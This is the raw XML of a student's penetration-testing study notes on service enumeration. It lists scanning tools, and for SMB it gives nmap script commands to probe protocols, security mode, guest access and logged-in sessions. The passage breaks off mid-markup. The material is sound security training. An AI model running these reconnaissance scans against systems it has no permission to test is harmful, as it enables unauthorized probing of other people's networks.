        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Rustscan – Uses Rust, operates at a lower level language and work much faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3AFDA" w14:textId="60B67DE7" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Autorecon – Based off what it initially finds, it will run a deep scan and continue to scan the host (much like NMAP Automator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFB3E6" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FDC5EB" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B863F8F" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3198982B" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE5FE98" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29795FAC" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9B6381" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6488614E" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7D5DB9" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365CC797" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629C4751" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BA94A5" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECEE711" w14:textId="7E21770A" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7E46C" w14:textId="1903E128" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Goals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EDA012" w14:textId="57648087" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Understand what service enumeration is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2723B03E" w14:textId="0F7B6BB7" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Identify common services and protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB720B0" w14:textId="79F051CF" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Service enumeration on those common services and protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82A919" w14:textId="5F7D5F36" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Understand the process for enumerating unfamiliar protocols and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF6A9F" w14:textId="248B503F" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Servers and Services</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4432DE3F" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0990200B" w14:textId="071806DC" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What is a service?</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>What is a server?</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>What do they mean in Cyber?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843880B" w14:textId="2AA813E7" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A sever is not just a machine, it also serves as a purpose and serves as something for the user that allows the machines connected to it to be utilized by other devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B3EEA" w14:textId="32572D80" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Servers will pool resources over the network to allow for system and device collaboration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28034D0B" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C171D7" w14:textId="499EC388" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2575FD0A" w14:textId="2590D366" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD42CAC" w14:textId="5337A8AF" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65916C2B" w14:textId="77777777" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ACF3BF" w14:textId="166708CD" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00792D20" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SMB – Server Message Block; Windows implementation of a file share system, much like FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B59B3" w14:textId="2B18ADD4" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>139 &amp; 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A51C558" w14:textId="5F6E9DFC" w:rsidR="00C04244" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>139 – NetBios, used to be a larger part of SMB in older versions of Windows, sets up session for SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF260C" w14:textId="28B49D5F" w:rsidR="00C04244" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>445 – This is where SMB is hosted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C82A00B" w14:textId="289ACEB4" w:rsidR="007275FA" w:rsidRPr="002A77BD" w:rsidRDefault="007275FA" w:rsidP="00C04244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To Mount: Network &gt; Map network drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFF0A9" w14:textId="79A37602" w:rsidR="00C05CCD" w:rsidRPr="002A77BD" w:rsidRDefault="00C05CCD" w:rsidP="00C04244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To Delete share: net use * /delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4F1C1" w14:textId="5ED113BC" w:rsidR="00C04244" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D1FEC8" w14:textId="6DEFEF21" w:rsidR="00C04244" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SMB is essentially a drive on the Windows machine that functions a lot like your regular SSD or HDD, except they can be accessed remotely through the SMB port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D557D69" w14:textId="77777777" w:rsidR="00C04244" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07558D5A" w14:textId="6B520251" w:rsidR="00C04244" w:rsidRPr="002A77BD" w:rsidRDefault="00C04244" w:rsidP="00C04244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-protocols (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40104388" w14:textId="440F31DB" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Could potentially reveal misconfigurations dependent on the version (should show on the NMAP scan result)</w:t>
      </w:r>
      <w:r w:rsidR="00D30699" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and dialects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651EC59E" w14:textId="1E4F9FD1" w:rsidR="00E061A0" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="00E061A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WannaCry utilizes this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4228E3D4" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665654B6" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08243BAA" w14:textId="0D41EB35" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-security-mode (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE741F9" w14:textId="2C1B6137" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could reveal if there are default configs or potentially a guest account on the SMB file server, allowing for access to a location that shouldn’t be public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498437A9" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DF1A4B" w14:textId="7113494C" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-sessions (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D388BBE" w14:textId="26E6D0D3" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could display if a user is logged in if we don’t pass a user into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321AF269" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D5FBF3" w14:textId="0F345454" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
